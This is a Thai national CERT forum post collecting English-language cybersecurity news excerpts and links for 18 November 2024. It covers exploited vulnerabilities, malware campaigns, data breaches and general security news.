NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ

    Cyber Threat Intelligence 18 November 2024

    Cyber Security News
    1
    1
    131
    โหลดโพสเพิ่มเติม
    • เก่าสุดไปยังใหม่สุด
    • ใหม่สุดไปยังเก่าสุด
    • Most Votes
    ตอบ
    • ตอบโดยตั้งกระทู้ใหม่
    เข้าสู่ระบบเพื่อตอบกลับ
    Topic นี้ถูกลบไปแล้ว เฉพาะผู้ใช้งานที่มีสิทธิ์ในการจัดการ Topic เท่านั้นที่จะมีสิทธิ์ในการเข้าชม
    • NCSA_THAICERTN
      NCSA_THAICERT
      แก้ไขล่าสุดโดย

      Vulnerabilities

      • Botnet Exploits GeoVision Zero-Day To Install Mirai Malware
        "A malware botnet is exploiting a zero-day vulnerability in end-of-life GeoVision devices to compromise and recruit them for likely DDoS or cryptomining attacks. The flaw is tracked as CVE-2024-11120 and was discovered by Piort Kijewski of The Shadowserver Foundation. It is a critical severity (CVSS v3.1 score: 9.8) OS command injection problem, allowing unauthenticated attackers to execute arbitrary system commands on the device. "Unauthenticated remote attackers can exploit this vulnerability to inject and execute arbitrary system commands on the device," warns Taiwan's CERT."
        https://www.bleepingcomputer.com/news/security/botnet-exploits-geovision-zero-day-to-install-mirai-malware/
        https://www.twcert.org.tw/en/cp-139-8237-26d7a-2.html
        https://securityaffairs.com/171067/malware/ddos-botnet-exploits-geovision-zero-day.html
      • Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575
        "It’s been a tricky time for Fortinet (and their customers) lately - arguably, even more so than usual. Adding to the steady flow of vulnerabilities in appliances recently was a nasty CVSS 9.8 vulnerability in FortiManager, their tool for central management of FortiGate appliances. As always, the opinions expressed in this blogpost are of the watchTowr team alone. If you don't enjoy our opinions, please scream into a paper bag."
        https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
        https://www.infosecurity-magazine.com/news/watchtowr-new-vulnerability/
      • Palo Alto Networks Warns Of Critical RCE Zero-Day Exploited In Attacks
        "Palo Alto Networks is warning that a critical zero-day vulnerability on Next-Generation Firewalls (NGFW) management interfaces, currently tracked as 'PAN-SA-2024-0015,' is actively being exploited in attacks. The flaw was originally disclosed on November 8, 2024, with Palo Alto Networks warning customers to restrict access to their next-generation firewalls because of a "potential" remote code execution (RCE) vulnerability impacting them. No signs of exploitation were detected at that time, but now, one week later, the situation has changed."
        https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-critical-rce-zero-day-exploited-in-attacks/
        https://therecord.media/palo-alto-networks-firewall-vulnerability-exploited
        https://thehackernews.com/2024/11/pan-os-firewall-vulnerability-under.html
        https://www.bankinfosecurity.com/palo-alto-reports-firewalls-exploited-using-unknown-flaw-a-26822
        https://cyberscoop.com/palo-alto-expedition-firewall-exploit-cisa-kev/
        https://www.infosecurity-magazine.com/news/palo-alto-confirms-new-0day/
        https://www.securityweek.com/palo-alto-networks-confirms-new-firewall-zero-day-exploitation/
        https://www.theregister.com/2024/11/15/palo_alto_networks_firewall_zeroday/
        https://securityaffairs.com/171057/hacking/palo-alto-networks-zero-day-exploitation.html

      Malware

      • Report On DDoSia Malware Launching DDoS Attacks Against Korean Institutions
        "The Russian hacktivist group NoName057 (16) has been active since March 2022, and their goal is to launch DDoS attacks against targets with anti-Russian views. In November 2024, NoName05, along with the pro-Russian hacktivist groups Cyber Army of Russia Reborn and Alixsec, launched DDoS attacks against the websites of major South Korean government agencies. The attacks were believed to have been triggered by the remarks made by Minister of Foreign Affairs Cho Tae-yul and President Yoon Suk-yeol regarding the supply of weapons to Ukraine. As a result of these attacks, various South Korean organizations suffered damages."
        https://asec.ahnlab.com/en/84531/
      • BrazenBamboo Weaponizes FortiClient Vulnerability To Steal VPN Credentials Via DEEPDATA
        "In July 2024, Volexity identified exploitation of a zero-day credential disclosure vulnerability in Fortinet’s Windows VPN client that allowed credentials to be stolen from the memory of the client’s process. This vulnerability was discovered while analyzing a recent sample of the DEEPDATA malware family. DEEPDATA is a modular post-exploitation tool for the Windows operating system that is used to gather a wide range of information from target devices. Analysis of the sample revealed a plugin that was designed to extract credentials from FortiClient VPN client process memory."
        https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/
        https://thehackernews.com/2024/11/warning-deepdata-malware-exploiting.html
      • Babble Babble Babble Babble Babble Babble BabbleLoader
        "The pace of innovation and development in the malware detection market is relentless, the same goes for the development of malware itself. Constantly charging and adapting to create ever more evasive and capable payloads. One such sector of this market is the loader (also called crypter or packer) market. In today’s threat landscape, loaders have become a critical tool in cybercrime operations, serving as the backbone for delivering a range of malicious payloads. Loaders are often the first stage in an attack chain, designed to stealthily execute or inject malware, such as info-stealers or ransomware, into a target system."
        https://intezer.com/blog/research/babble-babble-babble-babble-babble-babble-babbleloader/
      • Thanos Operator Targets Police Department In United Arab Emirates
        "The SonicWall Capture Labs threat research team has come across a variant of Thanos ransomware targeted at a police department in the United Arab Emirates (UAE). Thanos ransomware is a customizable and highly adaptable ransomware-as-a-service (RaaS) tool that allows cybercriminals to create and deploy ransomware tailored to their needs. It is known for its data-stealing capabilities, the ability to spread through networks and the use of advanced evasion techniques to avoid detection."
        https://blog.sonicwall.com/en-us/2024/11/thanos-operator-targets-police-in-united-arab-emirates/
      • Fake AI Video Generators Infect Windows, MacOS With Infostealers
        "Fake AI image and video generators infect Windows and macOS with the Lumma Stealer and AMOS information-stealing malware, used to steal credentials and cryptocurrency wallets from infected devices. Lumma Stealer is a Windows malware and AMOS is for macOS, but both steal cryptocurrency wallets and cookies, credentials, passwords, credit cards, and browsing history from Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium browsers. This data is collected into an archive and sent back to the attacker, where they can use the information in further attacks or sell it on cybercrime marketplaces."
        https://www.bleepingcomputer.com/news/security/fake-ai-video-generators-infect-windows-macos-with-infostealers/
      • GitHub Projects Targeted With Malicious Commits To Frame Researcher
        "GitHub projects have been targeted with malicious commits and pull requests, in an attempt to inject backdoors into these projects. Most recently, the GitHub repository of Exo Labs, an AI and machine learning startup, was targeted in the attack, which has left many wondering about the attacker's true intentions."
        https://www.bleepingcomputer.com/news/security/github-projects-targeted-with-malicious-commits-to-frame-researcher/
      • Phishing Emails Increasingly Use SVG Attachments To Evade Detection
        "Threat actors increasingly use Scalable Vector Graphics (SVG) attachments to display phishing forms or deploy malware while evading detection. Most images on the web are JPG or PNG files, which are made of grids of tiny squares called pixels. Each pixel has a specific color value, and together, these pixels form the entire image. SVG, or Scalable Vector Graphics, displays images differently, as instead of using pixels, the images are created through lines, shapes, and text described in textual mathematical formulas in the code."
        https://www.bleepingcomputer.com/news/security/phishing-emails-increasingly-use-svg-attachments-to-evade-detection/

      Breaches/Hacks/Leaks

      • Keyboard Robbers Steal 171K Customers' Data From AnnieMac Mortgage House
        "A major US mortgage lender has told customers looking to make the biggest financial transaction of their lives that an intruder broke into its systems and saw data belonging to 171,000 of them. American Neighborhood Mortgage Acceptance Company, which trades as AnnieMac Home Mortgage, said between August 21 and 23, an unknown intruder "viewed and/or copied" some customer data."
        https://www.theregister.com/2024/11/15/anniemac_data_breach/
      • T-Mobile Confirms It Was Hacked In Recent Wave Of Telecom Breaches
        "T-Mobile confirms it was hacked in the wave of recently reported telecom breaches conducted by Chinese threat actors to gain access to private communications, call records, and law enforcement information requests. "T-Mobile is closely monitoring this industry-wide attack, and at this time, T-Mobile systems and data have not been impacted in any significant way, and we have no evidence of impacts to customer information," T-Mobile told the Wall Street Journal, which first reported about the breach. "We will continue to monitor this closely, working with industry peers and the relevant authorities.""
        https://www.bleepingcomputer.com/news/security/t-mobile-confirms-it-was-hacked-in-recent-wave-of-telecom-breaches/
        https://www.itnews.com.au/news/t-mobile-hacked-in-massive-chinese-breach-of-telecom-networks-613175

      General News

      • Bitfinex Hacker Gets 5 Years In Prison For 120,000 Bitcoin Heist
        "A hacker responsible for stealing 119,754 Bitcoin in a 2016 hack on the Bitfinex cryptocurrency exchange was sentenced to five years in prison by U.S. authorities. The man, Ilya Lichtenstein, was arrested in February 2022 in Manhattan following a lengthy investigation led by the IRS, HSI, and the FBI, which managed to recover roughly 80% of the stolen cryptocurrency (94,000 Bitcoin)/ At the time of the theft, the 119,754 bitcoins were worth $78,000,000 but equaled $3.6 billion at the time of the seizure."
        https://www.bleepingcomputer.com/news/security/bitfinex-hacker-gets-5-years-in-prison-for-120-000-bitcoin-heist/
        https://thehackernews.com/2024/11/bitfinex-hacker-sentenced-to-5-years.html
        https://www.bankinfosecurity.com/bitfinex-hacker-lichtenstein-sentenced-to-5-years-in-prison-a-26824
        https://www.securityweek.com/man-who-stole-and-laundered-roughly-1b-in-bitcoin-is-sentenced-to-5-years-in-prison/
        https://www.infosecurity-magazine.com/news/bitfinex-hacker-jailed-5-years/
        https://securityaffairs.com/171029/cyber-crime/bitfinex-hacker-was-sentenced-to-5-years-in-prison.html
        https://www.theregister.com/2024/11/15/bitfinix_intruder_sentenced/
      • Threat Trend Report On Deep Web & Dark Web – Ransomware Groups & Cybercrime Forums And Markets Of October 2024
        "This trend report on the deep web and dark web of October 2024 is sectioned into Ransomware, Forums & Black Markets, and Threat Actor. We would like to state beforehand that some of the content has yet to be confirmed to be true."
        https://asec.ahnlab.com/en/84530/
      • Combating The Rise Of Federally Aimed Malicious Intent
        "The public sector is facing a security crisis. The acceleration of deepfake videos, AI-generated threats, and nation-state cyberattacks has put the federal government under increasing pressure to protect its employees, agencies, and the general public. Last year, the FBI, the National Security Agency (NSA), and the Cybersecurity and Infrastructure Security Agency (CISA) released details on the "growing challenge" that deepfake threats present to a range of federal agencies."
        https://www.darkreading.com/vulnerabilities-threats/combating-rise-federally-aimed-malicious-intent
      • Lessons From OSC&R On Protecting The Software Supply Chain
        "The complexity of today's software development — a mix of open source and third-party components, as well as internally developed code — has resulted in an abundance of vulnerabilities for attackers to exploit throughout the software supply chain. We've seen the direct effects of software supply chain attacks in incidents like the MOVEit and SolarWinds breaches, revealing that no industry sector, size of company, or stage of software development is immune. According to a survey from Enterprise Strategy Group (ESG), 91% of organizations experienced at least one software supply chain security incident in 2023, and 2024 hasn't seemed any better."
        https://www.darkreading.com/application-security/lessons-from-osc-r-on-protecting-the-software-supply-chain
      • AI’s Impact On The Future Of Web Application Security
        "In this Help Net Security interview, Tony Perez, CEO at NOC.org, discusses the role of continuous monitoring for real-time threat detection, the unique risks posed by APIs, and strategies for securing web applications. Perez also addresses how AI-driven threats are shaping the future of web security and the need for adaptive defenses."
        https://www.helpnetsecurity.com/2024/11/15/tony-perez-noc-org-web-application-security/
      • Critical Vulnerabilities Persist In High-Risk Sectors
        "Finance and insurance sectors found to have the highest number of critical vulnerabilities, according to Black Duck. The report, which analyzes data from over 200,000 dynamic application security testing (DAST) scans conducted by Black Duck on approximately 1,300 applications across 19 industry sectors from June 2023 to June 2024, found variations in vulnerability types and remediation practices."
        https://www.helpnetsecurity.com/2024/11/15/finance-industry-vulnerabilities/
      • Cybersecurity Dominates Concerns Among The C-Suite, Small Businesses And The Nation
        "Once relegated to the fringes of business operations, cybersecurity has evolved into a front-and-center concern for organizations worldwide. What was once considered a technical issue managed by IT departments has become a boardroom topic of utmost importance. With the rise of sophisticated cyberattacks, the growing use of generative AI by threat actors and massive data breach costs, it is no longer a question of whether cybersecurity matters but how deeply it affects every facet of modern operations."
        https://securityintelligence.com/articles/cybersecurity-dominates-concerns-c-suite-small-businesses-nation/
      • Indian Police Arrest Suspect In $230 Million WazirX Crypto Exchange Hack
        "Delhi police have arrested a suspect allegedly linked to the theft of at least $230 million worth of cryptocurrency from the India-based platform WazirX earlier this year. The suspect, identified as Masud Alam from West Bengal, was detained on Thursday. The Indian newspaper Times of India described the arrest as “a significant breakthrough in the ongoing investigation” into the WazirX hack."
        https://therecord.media/wazirx-crypto-exchange-hack-suspect-arrested-india
      • Letting Chatbots Run Robots Ends As Badly As You'd Expect
        "Science fiction author Isaac Asimov proposed three laws of robotics, and you'd never know it from the behavior of today's robots or those making them. The first law, "A robot may not injure a human being or, through inaction, allow a human being to come to harm," while laudable, hasn't prevented 77 robot-related accidents between 2015-2022, many of which resulted in finger amputations and fractures to the head and torso. Nor has it prevented deaths attributed to car automation and robotaxis."
        https://www.theregister.com/2024/11/16/chatbots_run_robots/
        https://arobey1.github.io/writing/jailbreakingrobots.html
      • Will Passkeys Ever Replace Passwords? Can They?
        "I have been playing around with passkeys, or as they are formally known, discoverable credentials. Think of passkeys as a replacement of passwords. They are defined in the Web Authentication (WebAuthn) specification of the W3C (World Wide Web Consortium). This work evolved from several prior efforts including those of the FIDO alliance (FIDO = Fast Identity Online)."
        https://www.theregister.com/2024/11/17/passkeys_passwords/

      อ้างอิง
      Electronic Transactions Development Agency(ETDA) b1442618-fdd1-4cbc-bd3f-0e8224046925-image.png

      1 การตอบกลับ คำตอบล่าสุด ตอบ คำอ้างอิง 0
      • First post
        Last post